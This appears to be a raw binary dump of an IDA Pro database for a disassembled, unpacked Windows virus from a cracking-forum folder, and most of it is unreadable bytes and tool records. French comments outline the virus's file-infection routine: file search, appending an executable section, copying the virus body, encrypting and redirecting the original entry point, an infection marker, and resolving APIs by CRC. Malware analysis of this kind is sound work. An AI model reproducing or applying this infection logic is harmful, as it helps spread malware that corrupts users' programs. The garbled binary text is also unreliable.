IDA0$)@  B-tree v 1.5 (C) Pol 1990    {  h< .@SSintN$ segs sarray .Sȁ.N0IMAGE_OPTIONAL_HEADER32.SizeOfUninitializedData.fN!IMAGE_OPTIONAL_HEADER.BaseOfCode .A.GN$ frnum .@0S; Alignment : 16 bytes ? .@A@ .@VS lpAddress .A .S@ @0@@@ $yj\O`X 1    Qug YI >PS ' ?q`L8*     v ` H 2j   E h Z   s4)Tc?JhX? )2 P  H_-Fvw,d \!lM|"3g T G  g   5      ~    e }   - " # =  $   K 9   ,  0 D t a   nCYL5   u(( ziTT F8&  $< j0# }|d+ 9 : u R;+taI5r`Q?0xiJ2.CharacterisN$ frb.lpStringN$ frc N$ frc. rN$ frd N$ frd. N$ frd. N$ frd.ArgNTDLN$ frd.DeviceMapInf N$ frd.hNTDL N$ frd.lpPathN$ frnumN$ funN$ funcs sarray# N$ id numbers N$ idpflagsN$ ignore micro N$ imports N$ libfuncsN$ loader name7 N$ nmSer N$ nmSerN N$ nullsubs$N$ original userB N$ patchesN$ regN$ regs sarrayN$ segN$ segs sarrayN$ signature names%.CharacteristicsumberOfLinenumbers RelocationsPointerToLinenumbers elocationsRawData SizeOfRawDataVirtualAddressMisc VirtualSize.PhysicalAddress8_IMAGE_SECTION_HEADER::$26EDCF116B4BEB8C983EA86C7BE2E882NameSECTION_HEADEROptionalHeader DataDirectoryNumberOfRvaAndSizes LoaderFlagspCommitReserve StackCommitReservellCharacteristicsubsystemCheckSumHeadersImageWin32VersionValueSubsystemVersionSubsystemVersioninorImageVersionjorImageVersionOperatingSystemVersionOperatingSystemVersion FileAlignmentSectionAlignment ImageBaseData BaseOfCode.AddressOfEntryPointUninitializedDatanitializedData izeOfCode LinkerVersion LinkerVersionMagic32 .FileHeader Signature NT_HEADERS SHARE_DELETEWRITEREADSHARESPECIFIC_RIGHTS_ALLTANDARD_RIGHTS_ALLEXECUTEWRITEREADQUIRED XIMUM_ALLOWED YNCHRONIZEOWNERRITE_DAC READ_CONTROLDELETEACCESS_SYSTEM_SECURITY GENERIC_ALLEXECUTEWRITEREADDESIRED_ACCESS DataDirectory.SizeVirtualAddress~MAGE_DATA_DIRECTORY}NumberOfRvaAndSizes| LoaderFlags{pCommitzReservey StackCommitxReservewllCharacteristicsvubsystemuCheckSumtHeaderssImagerWin32VersionValueqSubsystemVersionpSubsystemVersionoinorImageVersionnjorImageVersionmOperatingSystemVersionlOperatingSystemVersionk FileAlignmentjSectionAlignmenti ImageBasehDatag BaseOfCodef.AddressOfEntryPointeUninitializedDatadnitializedDatac izeOfCodeb LinkerVersiona LinkerVersion`Magic_OPTIONAL_HEADER^lfanew]2\nfo[oemidZresYvnoXrlcWsVipUumTspSsRxallocQinallocParhdrOrlcNpM.e_cblpLmagicK OS_HEADERJ.CharacteristicsISizeOfOptionalHeaderHymbolsGPointerToSymbolTableF TimeDateStampENumberOfSectionsDMachineC FILE_HEADERB.cAlternateFileName;FileName:19 Reserved08Low7 nFileSizeHigh6 WriteTime5LastAccessTime4ftCreationTime3.dwHighDateTime2 LowDateTime1FILETIME0dwFileAttributes/WIN32_FIND_DATA.Type- .DriveMap,ROCESS_DEVICEMAP_INFORMATION+ryptOEPa@ranslateIfForwarded@rlen_EndT@StartE@tkargs propagated EraseTape@xecution flows beyond limits_imp_EraseTape @fectFileJ@ ryptedOEP@ ddSectionE@ENDCURRENTBEGINBEGINIZEOF_SECTION_HEADER HORT_NAMEIMAGE_SIZEOF_SHORTsValidPE@ penAndMapFile@MAP_ALL_ACCESSREADWRITECOPYMAPpart ofs a ninstance ofstart@1=ZeGun0< oo many linesreadr@1he decision made by IDA was wrong and rolled back!TRUNCATE_EXISTING tructuresC earchFiles@oot NodePY WRITECOMBINEWRITEREADONLYCACHENOACCESSGUARD WRITECOPYWRITE_READ PAGE_EXECUTEEXISTING OPEN_ALWAYSTOP_DOWNTSERVERELEASEPRIVATEMAPPEDFREEDECOMMITCOMMIT EM_4MB_PAGESPAGEFILE_ATTRIBUTERIVE MACRO_CREATEndirect execution flowviews IDA View-AAKernel32Handle.@CRCW@ etApiFromCRC@ reeMappedFile@-ailed to trace the value of the stack pointer WRITE_THROUGHSEQUENTIAL_SCAN RANDOM_ACCESSPOSIX_SEMANTICS VERLAPPED REPARSE_POINTOPEN_NO_RECALL NO_BUFFERINGDELETE_ON_CLOSEFLAG_BACKUP_SEMANTICS TEMPORARYYSTEM SPARSE_FILE PARSE_POINTREADONLYOFFLINET_CONTENT_INDEXEDNORMALHIDDEN ENCRYPTED DIRECTORY COMPRESSED_ATTRIBUTE_ARCHIVE5ecision to convert to instruction/data is made by IDA UNKNOWNVABLEEMOTERAMDISK NO_ROOT_DIRFIXED RIVE_CDROM references (hint: redo analisys)!offset base (hint: delete offset)name (hint: use manual arg)comment (hint: delete comment)Afind alternative string for an operand (hint: delete alt. string)an't disassembleNEW REATE_ALWAYSCODE:'ttention! Probably erroneous situation.-lready data or code (hint: make 'unexplored')text9rdata;.idata? xref windowsDwindow configuration vmm functionsuser1 ructs' sarray* ourcefiles) r+QEUd9E h] c~*8GP+  n[?H1  ~e $9KZn}#%4   >  WB-d#u z g T *  .]l {\=PgzD7(  E:-!G"1;J  XgO@5xS=edi = Dbut du code du virus dans la nouvelle section mappe bSstrcpy(TempPath, Path);8ASDllASDll?x@/x@g%x@X@Path cFileNamenS6TempPath = "C:\" ( supprime le dernier caractre '*')S4Copie le code de la section dans le fichier infectSesi = EntryPoint du virus|STaille du virus\SImageBase du fichier mappvS!Dbut de la section = OEP crypthSROffset de la nouvelle section5SRecharge le fichier)SEnregistre les modifications S3Ajoute une nouvelle section et modifie le PEHeaderSImageBase du fichier mappSChemin du fichier infecterS&ImageBase du fichier infecter mappSMmoire temporaire de travailgAS FilePathx@ESASErrorX@HPA@SintAS ViewHandleASHandleAS MapHandleAS ViewHandleASHandleASDll4AS PathFileNameAS MapHandleAS ViewHandle#ASHandlex@x@x@HHx@DDx@<x@dGENERIC_READ or GENERIC_WRITE-A S dwShareMode+SlpSecurityAttributesSJzdJ .@X@qX@bMAASDllAS PathFileName|ASDllx@x@X@x@x@x@X@x@X@x@x@c YX qh   ASint/ASint4ASintASintASintASintA A MASintrASint{ASint5ASintASintASint9S CreateFileASdwCreationDistribution)A SdwFlagsAndAttributes$A "ShTemplateFile`P74 FileOpened4 LargeEnough% FileMapped)ViewOfFileMapped PathFileName0 PSintNOpenAndMapFileA X@A@X@A@ x@X@A@x@x@x@P$ErrorPE ErrorMZQuit baseAddress0 PS2N IsValidPEAS MapHandleAA@S VirtualFreeSesi = 00401386sS Crypt OEPnS ImageBasekSAddressOfOriginalEntryPointS VirtualAllocS lpAddressSdwSizeSintSintSecx = MappedAddressSebx = MapHandleS eax = HandleSTempPath = "C:\"+FileName~SlstrcatlSstrlen(TempPath);PxErrorQuit0 PN InfectFileJA:S FindClose,A@ SFindNextFileAaqX    x G    .     f  u d yf    L 2 rZ W s CD 43   ' \ <UUMJ  *]>kM2&`3[j}~oJ '   7Or]I$D8,M v h  7&4C   ^ m    sOet      Q R    / > X +A X@/AS cFileNameASPathX@/x@J+S3Sauvegarde hNTDLL dans le premier DWORD de la pileASDllX@llx@rX@iix@qZx@X@::x@kx@4    1  aA&A)AS<Supprime la chaine "NTDLL" prcdemment place dans la pileSRcupre l'OEP crypt N SearchFilesAA SZwQueryInformationProcessSProcessHandleS+ProcessInformationClass = ProcessDeviceMapSProcessInformationS ReturnLengthSZwSetInformationThreadS ThreadHandleS,ThreadInformationClass = ThreadBasePrioritySThreadInformationLength ArgNTDLLNThreadkA@bS Decrypt OEPUS CreateThreadSS hKernel32QSlpThreadAttributesLS dwStackSizeKSlpStartAddress = 00401072JSlpParameter = hNTDLLHSdwCreationFlagsFS lpThreadIdCSeax = 00401072BSeax = 004010428Seax = 05S CryptedOEP4Seax = 00401034S LoadLibraryASintNstartA; Alignment : 16 bytes ?4; Flags E0000040: Data Executable Readable Writable+; Offset to raw data for section: 000004006; Section size in file : 00000A00 ( 2560.)6; Virtual size : 000008A2 ( 2210.)(; Section 1. (virtual address 00001000)4; Format : Portable executable for IBM PC (PE)SO; File Name : F:\ForumCrack\BugTrack\Source\BT01_Unpacker\Unpacked_Virus.exe instance ofis a-part ofNODE $ MAX LINKKyj_ U K Ap {VG. L  xb M 9*= 3 )         cm H 4        R_ > *     gX N D : 0 &       ~ tgU#   tfXC5,%  ||rh^TJ;,xiZK<-@,A@Z,A@l,A@,A@,A@,A@,A@<,A@X,A@,A@,A@,A@%,A@?,A@,A@,A@,A@,A@ ,A@),A@5,A@,A@,A@,A@>,A@_,A@w,AZ,N$ auto type callees , C_K/1~'Ar@rP#0 @ !N3The decision made by IDA was wrong and rolled back  Y(AS; S@r@@J@@@@E@@@.@W@@B@:0 i A@GA DN$ xref windowsCN StructuresSؼ3,} w$ꚵ-̻tfEA ;X mR\d0P2lܮv?on?bf(\5FFכ"Q}\ogc 8 cXBN$ original userSSE@ U@@3@3@.@ /l@4@ 0@2@@2J@@LJ@2@S@@3@ L@N@N@7)@4@5@2@:8@3@:@0W@V@ a@*l@/b@0/@.q@./@1J@@"6@//@2@*q@+/@3@-@-@1@@.E@ @0@@,E@ @ .@- @a@6@oE@#$ @ oE@! @#@@*@)@!t@ &E@ @ rJ@E@ $ @$@@ )@@%E@ @ . @N IDA View-AAAN $ Compiler $@B?N.idata>S@ EraseTape=NZeGun1W@W?Pp.@.)Pl@Ph,@PdE@EP` ;@cP\ @PX /@;PTJ@JPP2@HPL:)S@@ns"N$ funcsN7Decision to convert to instruction/data is made by IDAN)Attention! Probably erroneous situation.N/Failed to trace the value of the stack pointerA@qNToo many linesNExecution flows beyond limitsD*A@N/Already data or code (hint: make 'unexplored')NCan't disassembleNIndirect execution flowN,Can't find references (hint: redo analisys)N*Can't find comment (hint: delete comment)NHCan't find alternative string for an operand (hint: delete alt. string)N'Can't find name (hint: use manual arg).N-Can't find offset base (hint: delete offset)tdT+?;/g[K;$~:dNf{#N"N!M 7~{9"h`5R  ;  ' .k@{ wcRH9 / %        uf \F7 -    c  h$       tZ@& r ^ T6 , "      r h ^? 5 +e  K  1  p f \< 27L9#N$ fr5.PaXM1Stack of TNN$ fr3.cFileNameN $ fr3.PathN$ fr7.FileImageBaseStack of AddSectionsMt SearchFiles{" .LM>>`~  NM} = }N $ fr2.lpPathN$ fr2.FileHandleN$ fr2.FindDatad.A/Thread{"N $ frb.CRCN $ frb.LengthN$ frb.lpStringstartSN $ fr8.DllN $ fr8.CRCXM1   Y N$ fr5.PathFileNameN$ fr6.MapHandleN$ fr6.ViewHandleN $ fr6.HandleN $ fr9.ApiRVAN$ fr9.ImageBaseN$ fr7.BytesWrittenN$ fr7.FileHandleN$ fr7.SectionMemAllocN$ fr7.FilePathN$ fr7.MemAllocN$ fr3.MemAllocN$ fr4.ReturnCodeN$ fr4.baseAddressN$ fr5.BaseAddressN$ fr3.BaseAddressN$ fr3.MapHandleN $ fr3.HandleN$ fr5.MapHandleN $ fr5.HandleN$ fr3.TempPathA@   AAAAAAAA@A! AAAAmNFILE_ATTRIBUTE_COMPRESSEDNFILE_ATTRIBUTE_REPARSE_POINTNFILE_ATTRIBUTE_SPARSE_FILENFILE_ATTRIBUTE_TEMPORARYNFILE_ATTRIBUTE_NORMALNFILE_ATTRIBUTE_ENCRYPTED@NFILE_ATTRIBUTE_ARCHIVE NFILE_ATTRIBUTE_DIRECTORYNFILE_ATTRIBUTE_SYSTEMNFILE_ATTRIBUTE_HIDDENNFILE_ATTRIBUTE_READONLYNMACRO_FILE_ATTRIBUTENDRIVE_RAMDISKAN DRIVE_CDROMAN DRIVE_REMOTEAN DRIVE_FIXEDANDRIVE_REMOVABLEANDRIVE_NO_ROOT_DIRANDRIVE_UNKNOWNAN MACRO_DRIVEE&AVN IDA viewsN $ Auto readyN$ window configurationucturesn{" rings windowXt{" ub_401102 Names window,:{" IDA View-AHex View{"Functions windowBW{"HEnums{"N $ fr9.var_4N $ fr9.var_2CN $ fr8.var_8N $ fr8.arg_34N $ fr8.var_4N$ fr2.FileMask~N$ fr2.PathFileNametN $ frc. rN$ frcrN $ frb. sqN $ frb. rN$ frbpM' rq  nN $ fra. smN $ fra. rN$ fralM nmjN $ fr9. siN $ fr9. rN$ fr9hM-' ji  fN $ fr8. seN $ fr8. rN$ fr8dM9  fe  ,  bN $ fr7. saN $ fr7. rN$ fr7`M?  ba   ^N $ fr6. s]N $ fr6. rN$ fr6\M'^]   YN $ fr5. rN$ fr5VN $ fr4. sUN $ fr4. rN$ fr4TM VU RN $ fr3. sQN $ fr3. rN$ fr3PMI     RQ  NN $ fr2. sMN $ fr2. rN$ fr2t        |m cS G ; / #           s gX L @ 4 (           x l `Q G7 +           { o c W K< 0 $            t h \ PA 7'           w k _ S G ;,      \ k      u     L @ 4 (          x l < ! 0 H T ` @ O    Ye t       0 $            t \ P D     , 8 h0 ?      p U Ia |              I = 1 %         z n V J >    & 2 b s^R>.!   |hYG7 & uk_UF4! k Y qc YOC9*  }sg]L6' vl\F6)  zjZJ:* AASSƁSSSSSSSSSAA+ƁB^J.0}ȁSȁ cFileNamePathA  +ƁB^J.0}ȁSȁ ImageBase BytesWrittenA+ƁB^J.0}ȁSȁA +ƁB^J.0}ȁSȁA+ƁB^J.0}ȁSȁA+ƁB^J.0}ȁSȁA+ƁƁB^J.0}ȁSȁA+ƁB^J.0}ȁSȁA  +Ɓ B^J.0}ȁSȁA+ƁB^J.0}ȁSȁsegs  sarrayregspatches original userBullsubs$NnmSerEA oader name7libfuncs&mports gnore micro pflags id numbers sarray#uncs"numGlpPath(hNTDLL& DeviceMapInfo)ArgNTDLL's%. r$d#. rtcslpStringLengthCRCsr. rqbpsn. rmal4var_2C ImageBaseApiRVAsj. ri9h8var_4arg_34DllCRCsf. re8dSectionMemAllocMemAllocPath FileHandlesb. ra7` ViewHandle MapHandleHandles^. r]6\ PathFileName MapHandleHandle BaseAddresss. rY5X baseAddress ReturnCodesV. rU4TTempPathemAlloc MapHandleHandle BaseAddresssR. rQ3Preserved=lpPath} PathFileName~ndDataMask FileHandlesN. rMr2Lxups sarray fileregionsums( entry pointsauto type callees, PE header8MARKSFileInfo Compiler $@ readyN$ Auto+.J^Ɓ+B0}ȁSȁA.J^Ɓ+B0}ȁSȁA.J^Ɓ+B0}ȁSȁA.J^Ɓ+B0}ȁSȁA.J^BƁ+0}ȁSȁA.J^BƁ+0}ȁSȁA.J^BƁ+0}ȁSȁA.J^BƁƁ+0}ȁSȁA.J^BƁ+0 .S}i  Q       U F   q`PA4$         | r h ^ T J? 5*         {l[Lc <v J ua_PC5 z__N$ fileregions sarrayAV @ @@B@ 0 0@@@ @"@S@ @@N$ fileregionsN$ MARKSS@startN$ entry pointsI@A@@S@@ @ @0@@@N$ regs sarrayAVX@&@@0&@0&@  %@ &@S@%@N$ regsS@ @ @0@@@N$ segs sarray AV _@!@@=:0!@0<:!@ ;: @ ?:S@!@9: N$ segsS`&XA=Freeware version N$ user1N $ idpflags AN$ ignore microZ1 HM @uN$ vmm functionsd7|dC//D/*/+]A!_A@$S KERNEL32N $ importsA>N $ fixupsN $ patchesN $ nmSerNAN $ nmSerEAN $ FileInfoV?F:\ForumCrack\BugTrack\Source\BT01_Unpacker\Unpacked_Virus.exeAIDA)metapcI @@@P@@P@@P@ ( 3str_a=FP@@3BG_cdecl=__cdecl;_pascal=__pascal;_huge=__huge;_near=__near;_far=__far;__inline=;_inline=;inline=;CM_WINNT;MPR50;_INTEGRAL_MAX_BITS=64;_MSC_VER=1200;_CHAR_UNSIGNED=1;_M_IX86=300;__MT__=1;__TLS__=1;_Windows=1;__WIN32__=1;_WIN32_WINNT=0x0500;WINVER=0x0500;_WIN32=1;OLEDBVER=0x0250;SECURITY_WIN32;WIN32_SUPPORT;DBNTWIN32;W32SUT_32;A4/Program Files/Microsoft Visual Studio/VC98/include S$Portable executable for IBM PC (PE)N Root Node)JBq^ A; Alignment : 16 bytes ?4; Flags E0000040: Data Executable Readable Writable+; Offset to raw data for section: 000020006; Section size in file : 00000200 ( 512.)6; Virtual size : 00001000 ( 4096.) .@@S(; Section 4. (virtual address 00004000)@L4)uR4%!/>L[ixcr v S HX Q J<% w < e 1{GV  ,?! { t  x QP D9   yn5'|Wzo d*E9*U F$  K 4@  L |  U >Jd Q s [ Q  d++  @+@Kedi TempAlloc@Nesi MappedFiledJQSJ@A@P)" NoFileHandle NoViewHandle NoMapHandle"A@A@Pc AddSAlign IsAlignOKSectionAlignOKAdjustFileAlignment IsFileAlignOKAlreadyInfectedQuitX@  .@UA!FileImageBase MemAlloc FilePath0 pTSSS&dwSize = RSize de la nouvelle SectionIS Enregistre le nouvel EntryPointdFS-Nouveau EntryPoint = Dbut de la section + 4CS%eax = VOffset de la nouvelle section@S#Enregistre la nouvelle SizeOfImageddJ=SJ8S#Somme des 2 = nouvelle SizeOfImage5S%ebx = VOffset de la nouvelle sectionƁd2S#eax = VSize de la nouvelle sectionƁd+S:Executable, Readable, Writeable, Contains Executable CodeySLCharacteristics = Executable, Readable, Writeable, Contains Executable CodeƁdƁd%SƁdSƁdSƁdSƁ S" = ROffset de la nouvelle sectionƁd S)ROffset + RSize de la section prcdenteSNouvelle sectionS#RawOffset de la section prcdenteƁdS!RawSize de la section prcdenteƁdSSectionHeader prcdentA S+Enregistre la RSize de la nouvelle sectionƁdS+Ajoute le FileAlignment du programme cibleA@S-Enregistre le VOffset de la nouvelle sectionƁdSesi = Nouvelle SectionSAjoute le SectionAlignmentA@A@S$SectionAlignment du programme cibleSMultiple de SectionAlignment?A@SAjust au SectionAlignmentS<eax = VirtualAddress + VirtualSize de la section prcdentedƁSebx = VirtualSizedƁSeax = VirtualAddressSSection prcdenteA dƁSStore VirtualSizedƁS Enregistre le nom de la sectionsSesi = Premier SectionHeaderdSNouveau SectionHeaderA Sesi = premier SectionHeaderSBSi la dernire section s'appelle .N_K le fichier est dj infectSesi = Dernier SectionHeaderSPremier SectionHeaderd¾:oSNumberOfSections + 1kS¯deSd_SCdYSdX@)ASDllASDllpASDllXASDllX@x@x@X@x@x@wx@X@kkx@_x@fS Taille du fichier > 4096 octets+ASDll ASDllASDll2x@X@&&x@@x@X@x@"x@ @  A!HASintLASintNASint(ASint ASintASintASintASintASintASintASintASintASintASintmASintSintx@X@X@A@x@Sebx = FileAlignmentX@X@x@x@X@X@x@x@Secx = NumberOfSectionsx@S Section NameA SNumberofSections`w6     3 E  )SintN AddSectionEA-S CloseHandleSUnmapViewOfFileX@S CloseHandlex@`Handle ViewHandle MapHandle0 PSintNFreeMappedFileAA@SMapViewOfFileSdwDesiredAccessA A@SintASCreateFileMappingASlpFileMappingAttributesS flProtectA SintASintArS CloseHandleZS GetFileSize wh ^PA3$   < K   rdUG . -     H se  N ? 5'   w  d   < 1  Y aS DB ; q jb [ T M  = 63 , %   /'      p mNz8L&?(xv>Xgxtoa I>/! S%6E fU{pnZb K4NB6* ^SH8(   S "     j D5   X  ?%SOKSErreurSRtablit le nombre de sectionsSesi = PEHeaderdS5Agrandit le fichier pour insrer la nouvelle sectionS5nNumberOfBytesToWrite = RSize de la dernire SectionASDllASDllASDllASDll~ASDllX@x@x@x@x@x@x@dGENERIC_READ or GENERIC_WRITE w_>ZX@X<|S*rcupre l'indice dans le tableau de WORDSApi Not Found'SCalcul de la VA de l'apiS&Rcupre l'adresse de l'api forwardeS.Calcul le CRC du nom de la fonction forwardeSLoadLibraryA(DllName)NTranslateIfForwardedA$A@P NotForwardedA@Pd GetDll_Arg GetDll_Done@@find_function_loop. CRC_FoundNotFound*@@find_function_finishedQuitS-Rcupre l'addresse dans le tableau de DWORDSAddressOfFunctionswSAddressOfNameOrdinalspS Api trouve?kA@fA@ASDllASCRCSLengthAS lpStringASApiRVAAS ImageBasex@x@WX@x@X@x@X@uux@8X@ddx@kX@]]x@fX@VVx@W lpStringLength0 PWA8A@[SFCompare le CRC du nom de l'api courante avec le CRC pass en argumentUSedi = ApiNameS$ecx = taille de la chaine (ApiName)TN strlen_EndEN strlen_StartNS#strlen(ApiName) // edi = ApiName@S argument CRC;S@Nom de la fonction couranteA@3SAddressOfNames0S+NumberOfNumbers // Nombre d'apis exportes@.@%{ebp ImageBase@.redxExportDirectory*SExportDirectory RVA'S @PEHeaderS'Sinon, Kernel32 est utilis par dfaut$A@SATest si le HINSTANCE (ImageBase) d'une dll est pass en argument!A@4; Flags E0000040: Data Executable Readable Writable+; Offset to raw data for section: 000010006; Section size in file : 00001000 ( 4096.)6; Virtual size : 00001000 ( 4096.)0S(; Section 3. (virtual address 00003000)A hDevice dwEraseType bImmediate0 P=DWORD=HANDLE=DWORD=BOOL; ; Imports from KERNEL32.dll; ; Alignment : 16 bytes ?4; Flags E0000040: Data Executable Readable Writable+; Offset to raw data for section: 00000E006; Section size in file : 00000200 ( 512.)6; Virtual size : 0000005A ( 90.)S(; Section 2. (virtual address 00002000)N__imp_EraseTapeD@  AAd@ X@ hDevice dwEraseType bImmediateS0 P=DWORD=HANDLE=DWORD=BOOLN EraseTapeASTrap to Debuggerx@SFakeAx@n~x@tzX@vvx@ztX@~nX@S @1ANGetCRCX@ITA@QS 7C + 3C = B8X@=KA@Ix@T?A@=x@K7S EAX = PEBX@P@@@findkernel32_nt: @@findkernel32_9x @@findkernel32_finished  S-Merci Neitsa pour ton article OwnGetProc! :p.NGetKernel32HandleX@x@S LoadLibraryASDllAx@$x@$SintA` ImageBaseApiRVA0 P.X'    i`aSintAX@8x@X@X@x@$x@.x@!_2 CRCDll0 PS@ @ A ANGetApiFromCRCAA@X@A@S VirtualFreeSintASintASint AS CloseHandleSintAS WriteFileSintAS lpBufferSintAS lpOverlappedS%Place le curseur la fin du fichierSSetFilePointerSintASintASintASint AS CreateFileASint{ASintvASinttASintrASint pASint kASintiA_x@ZS VirtualAllocSDll .@XA   y oQB 8 .     y oO@ 6 ,     v l b?0 & vg X I : +    s i _ U K8)    z pXI ? 5$        wk_SG:+ !      { q\M C 9&       k\ R H7(       y o]N D :'      | r hWH > 4$     {l\M> /    {l b XJ @ 6*   ~ tZK A 7) NMACRO_IMAGE_SIZEOF_SHORT(E&ANFILE_MAP_ALL_ACCESSANFILE_MAP_READANFILE_MAP_WRITEANFILE_MAP_COPYANMACRO_FILE_MAPE&AEE E E E E EE@E EEEEEE@E EEEEENMEM_4MB_PAGESAN MEM_TOP_DOWNAN MEM_RESETAN MEM_MAPPEDAN MEM_PRIVATEAN MEM_FREEAN MEM_RELEASEAN MEM_DECOMMIT@A@N MEM_RESERVE A N MEM_COMMITANPAGE_WRITECOMBINEAN PAGE_NOCACHEAN PAGE_GUARDANPAGE_EXECUTE_WRITECOPYANPAGE_EXECUTE_READWRITE@AANPAGE_EXECUTE_READ A!N PAGE_EXECUTEANPAGE_WRITECOPYA NPAGE_READWRITEANPAGE_READONLYANPAGE_NOACCESSA    @  @ mN MACRO_PAGEANTRUNCATE_EXISTINGAN OPEN_ALWAYSANOPEN_EXISTINGANCREATE_ALWAYSAN CREATE_NEWAN MACRO_CREATEE&AEE@E EEEEEE EE EEEEEEE@E EEEENFILE_FLAG_OPEN_NO_RECALLANFILE_FLAG_OPEN_REPARSE_POINT A NFILE_FLAG_POSIX_SEMANTICSANFILE_FLAG_BACKUP_SEMANTICSANFILE_FLAG_DELETE_ON_CLOSEANFILE_FLAG_SEQUENTIAL_SCANANFILE_FLAG_RANDOM_ACCESSANFILE_FLAG_NO_BUFFERING A NFILE_FLAG_OVERLAPPED@A@NFILE_FLAG_WRITE_THROUGHAN#FILE_ATTRIBUTE_NOT_CONTENT_INDEXED A .NFILE_ATTRIBUTE_OFFLINE  { qc Y O8)   xe( }rW3O_I![  uj[4)}Z9    v hY O= /    $rQ'{Rog{dE(    g H +nO.0g4 +D@L+D)BD^M0_`ab c d e f g h i j klmnopq r s t uvw x y z { | `.D0D3QJD@=MA0CDE F G HIeN*IMAGE_OPTIONAL_HEADER.AddressOfEntryPointdN.IMAGE_OPTIONAL_HEADER.SizeOfUninitializedDatacN,IMAGE_OPTIONAL_HEADER.SizeOfInitializedDatabN!IMAGE_OPTIONAL_HEADER.SizeOfCodeaN)IMAGE_OPTIONAL_HEADER.MinorLinkerVersion`N)IMAGE_OPTIONAL_HEADER.MajorLinkerVersion_NIMAGE_OPTIONAL_HEADER.MagicNIMAGE_OPTIONAL_HEADER]NIMAGE_DOS_HEADER.e_lfanew\NIMAGE_DOS_HEADER.e_res2[NIMAGE_DOS_HEADER.e_oeminfoZNIMAGE_DOS_HEADER.e_oemidYNIMAGE_DOS_HEADER.e_resXNIMAGE_DOS_HEADER.e_ovnoWNIMAGE_DOS_HEADER.e_lfarlcVNIMAGE_DOS_HEADER.e_csUNIMAGE_DOS_HEADER.e_ipTNIMAGE_DOS_HEADER.e_csumSNIMAGE_DOS_HEADER.e_spRNIMAGE_DOS_HEADER.e_ssQNIMAGE_DOS_HEADER.e_maxallocPNIMAGE_DOS_HEADER.e_minallocONIMAGE_DOS_HEADER.e_cparhdrNNIMAGE_DOS_HEADER.e_crlcMNIMAGE_DOS_HEADER.e_cpLNIMAGE_DOS_HEADER.e_cblpKNIMAGE_DOS_HEADER.e_magicNIMAGE_DOS_HEADERM0KLMNOPQRSTUVWXYZ[\] IN"IMAGE_FILE_HEADER.CharacteristicsHN'IMAGE_FILE_HEADER.SizeOfOptionalHeaderGN"IMAGE_FILE_HEADER.NumberOfSymbolsFN'IMAGE_FILE_HEADER.PointerToSymbolTableEN IMAGE_FILE_HEADER.TimeDateStampDN#IMAGE_FILE_HEADER.NumberOfSectionsCNIMAGE_FILE_HEADER.MachineNIMAGE_FILE_HEADER.!+!S0!AA.?+?S0?@A.1 +1 S01 ?A0).)S+)>A=N$ fr2.reserved. z+ zS0 z'wh6kL}DDD@YI@N.IMAGE_OPTIONAL_HEADER32.SizeOfInitializedDataN#IMAGE_OPTIONAL_HEADER32.SizeOfCodeN+IMAGE_OPTIONAL_HEADER32.MinorLinkerVersionN+IMAGE_OPTIONAL_HEADER32.MajorLinkerVersionNIMAGE_OPTIONAL_HEADER32.MagicNIMAGE_OPTIONAL_HEADER32M0                   `dBNIMAGE_NT_HEADERS.FileHeaderACNIMAGE_NT_HEADERS.SignatureNIMAGE_NT_HEADERSM ``oke_JŒ^Œ+ŒBŒ.Œ0ŒS}ŒAEEENFILE_SHARE_DELETEANFILE_SHARE_WRITEANFILE_SHARE_READAmNMACRO_FILE_SHAREANSPECIFIC_RIGHTS_ALLANSTANDARD_RIGHTS_ALLANSTANDARD_RIGHTS_EXECUTEANSTANDARD_RIGHTS_WRITEANSTANDARD_RIGHTS_READANSTANDARD_RIGHTS_REQUIREDANMAXIMUM_ALLOWEDAN SYNCHRONIZEAN WRITE_OWNERAN WRITE_DACAsN READ_CONTROLANDELETEANACCESS_SYSTEM_SECURITYAN GENERIC_ALLANGENERIC_EXECUTEA NGENERIC_WRITEvD@/A@N GENERIC_READvD@/ANMACRO_DESIRED_ACCESS@ EAJz^z+zBz.z0zS}zAd}N$IMAGE_OPTIONAL_HEADER.DataDirectoryA~NIMAGE_DATA_DIRECTORY.Size~N$IMAGE_DATA_DIRECTORY.VirtualAddressNIMAGE_DATA_DIRECTORYM0~  |N*IMAGE_OPTIONAL_HEADER.NumberOfRvaAndSizes{N"IMAGE_OPTIONAL_HEADER.LoaderFlagszN'IMAGE_OPTIONAL_HEADER.SizeOfHeapCommityN(IMAGE_OPTIONAL_HEADER.SizeOfHeapReservexN(IMAGE_OPTIONAL_HEADER.SizeOfStackCommitwN)IMAGE_OPTIONAL_HEADER.SizeOfStackReservevN)IMAGE_OPTIONAL_HEADER.DllCharacteristicsuN IMAGE_OPTIONAL_HEADER.SubsystemtNIMAGE_OPTIONAL_HEADER.CheckSumsN$IMAGE_OPTIONAL_HEADER.SizeOfHeadersrN"IMAGE_OPTIONAL_HEADER.SizeOfImageqN(IMAGE_OPTIONAL_HEADER.Win32VersionValuepN,IMAGE_OPTIONAL_HEADER.MinorSubsystemVersionoN,IMAGE_OPTIONAL_HEADER.MajorSubsystemVersionnN(IMAGE_OPTIONAL_HEADER.MinorImageVersionmN(IMAGE_OPTIONAL_HEADER.MajorImageVersionlN2IMAGE_OPTIONAL_HEADER.MinorOperatingSystemVersionkN2IMAGE_OPTIONAL_HEADER.MajorOperatingSystemVersionjN$IMAGE_OPTIONAL_HEADER.FileAlignmentiN'IMAGE_OPTIONAL_HEADER.SectionAlignmenthN IMAGE_OPTIONAL_HEADER.ImageBase.gN!IMAGE_OPTIONAL_HEADER.BaseOfDatauLyH  | Q $ o> pD9*      w i [L B0 "         v hW I ; -         r hV H : ,          r dS E8 > 7 0 ) "       ` Y R K DyXL.SD$f5  t h \ P D5 )            | p d X L= 3#             wg8 D@D@y52+%SȁA.J^BƁƁ+0}ȁSȁAȁȁ}0.J^BƁS+ A.J^Ɓ+B0}ȁSȁAN%IMAGE_SECTION_HEADER.CharacteristicsN)IMAGE_SECTION_HEADER.NumberOfLinenumbersN)IMAGE_SECTION_HEADER.NumberOfRelocationsN*IMAGE_SECTION_HEADER.PointerToLinenumbersN*IMAGE_SECTION_HEADER.PointerToRelocationsN&IMAGE_SECTION_HEADER.PointerToRawDataN#IMAGE_SECTION_HEADER.SizeOfRawDataN$IMAGE_SECTION_HEADER.VirtualAddressdNIMAGE_SECTION_HEADER.MiscANE_IMAGE_SECTION_HEADER::$26EDCF116B4BEB8C983EA86C7BE2E882.VirtualSizeNI_IMAGE_SECTION_HEADER::$26EDCF116B4BEB8C983EA86C7BE2E882.PhysicalAddressN9_IMAGE_SECTION_HEADER::$26EDCF116B4BEB8C983EA86C7BE2E882M6  